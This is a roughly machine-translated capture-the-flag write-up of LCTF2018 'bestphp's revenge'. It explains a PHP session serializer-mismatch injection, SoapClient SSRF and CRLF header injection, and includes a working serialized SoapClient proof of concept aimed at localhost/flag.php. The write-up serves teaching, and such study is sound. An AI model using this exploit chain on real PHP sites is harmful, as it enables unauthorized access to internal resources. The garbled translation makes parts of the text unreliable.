table of Contents
Brush title record: [LCTF] bestphp's revenge
Recurring topic links: https://buuoj.cn/challenges
Reference Links: https://xz.aliyun.com/t/3341#toc-22
sign to see the problem from LCTF WEB PHP deserialization
LCTF2018-bestphp's revenge detailed explanations
This is a web sign LCTF problem? ? excuse me. Now a day has been a bit behind the title. . . .
First, knowledge
Knowledge of these points formed by a chain link, so I speak with the
session deserialization -> soap (ssrf + crlf) -> call_user_func soap-based activation
1, SoapClient trigger deserialization lead ssrf
2, serialize_hander processing session session injection results in different ways
3, crlf vulnerability
Second, problem-solving ideas
First, php deserialization not available class can call php native class reference
using the deserialization PHP native type ,
paste source and poc speaking
//index.php
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET[f],$_POST);
session_start();
if(isset($_GET[name])){
$_SESSION[name] = $_GET[name];
}
var_dump($_SESSION);
$a = array(reset($_SESSION),'welcome_to_the_lctf2018');
call_user_func($b,$a);
?>
//flag.php
session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
$_SESSION['flag'] = $flag;
}
only localhost can get flag!
It is easy to think of f
the incoming extract
cover b as a function of what we want, the problem is the use of the back session.
Said first SoapClient
reference see SOAP security issues from a few questions CTF
SOAP (Simple Object Access Protocol) is a connection or interface between the client and the Web service or Web service.
Which employs HTTP as the underlying communication protocol, XML format as the data transfer
SOAP message received substantially unidirectional transmission end from the transmitting end, they often perform similar combined request / reply mode.
So if we can call the deserialization SoapClient
to flag.php
send a request, it can be achieved ssrf
I took the problem to be solved is:
- Where trigger deserialization
- How to control the content of deserialized
Here we must know call_user_func()
the function if the incoming parameter is the array
type of case, as a member of the array will be the class name and method, for example, you can start with this question in extract()
the cover b into call_user_func()
, reset($_SESSION)
that is $_SESSION['name']
, we can pass name=SoapClient
, then finally call_user_func($b, $a)
becomes call_user_func(array('SoapClient','welcome_to_the_lctf2018'))
, that is call_user_func(SoapClient->welcome_to_the_lctf2018)
, due to the SoapClient
no class welcome_to_the_lctf2018
this method, it will call the magic method __get()
in order to send the request
That SoapClient
how the content control it, paste of poc Gangster
<?php
$target = "http://127.0.0.1/flag.php";
$attack = new SoapClient(null,array('location' => $target,
'user_agent' => "N0rth3ty\r\nCookie: PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4\r\n",
'uri' => "123"));
$payload = urlencode(serialize($attack));
echo $payload;
Here also involves crlf, reference [Reserved] and use examples CRLF Injection vulnerability analysis , my understanding is that because http request met two \r\n
other words %0d%0a
, will the first half as a header analysis, while the remaining part as a body, so if the head is controllable, you can inject crlf achieve modify http request packet. If my understanding is wrong, please correct me big brother.
The poc crlf is the use of fake requests to visit flag.php and save the result in a cookie as PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4
a session.
Finally, it is how to make php deserialize the result controllable. This involves the mechanism php anti sequences.
php content of the session is not in memory, but rather a way to store files, storage is to be determined, the default file is stored by the configuration item session.save_handler.
Sess_sessionid stored files are to be named, the contents of the file is the content of the sequence, then after the session value.
The presence of three configuration items in php.ini:
session.save_path="" --设置session的存储路径
session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
session.serialize_handler string --定义用来序列化/反序列化的处理器名字。默认是php(5.5.4后改为php_serialize)
PHP processor with built-in time will be used to store $ _SESSION data serialization and deserialization, less commonly used, corresponding to three different processing formats:
processor | Corresponding to the storage format |
---|---|
php | + Through + keys vertical serialize () function value deserialization process |
php_binary | ASCII characters corresponding to the length of the key name after the + + keys serialize () function value deserialization process |
php_serialize(php>=5.5.4) | After serialize () array processing functions deserialization |
Configuration options session.serialize_handler, the processor may be provided and used when serializing the deserialized through option.
If the processor used in the PHP $ _SEESION data stored deserialize and serialize the use of different processors, the cause data can not be correctly deserialize, by special forgery, counterfeiting and even arbitrary data.
When the storage process is php_serialize then php to call processing, if the injection time data a=|O:4:"test":0:{}
, then the contents of the session are a:1:{s:1:"a";s:16:"|O:4:"test":0:{}";}
then a:1:{s:1:"a";s:16:"
be resolved into php keys, a test object is later injection.
We just started call_user_func
not used, can be constructed session_start(['serialize_handler'=>'php_serialize'])
to achieve the effect of the injection.
Third, the problem-solving steps
The resulting first injection session poc
Trigger deserialization transmission request so SoapClient
cookie access can be obtained by carrying the flag poc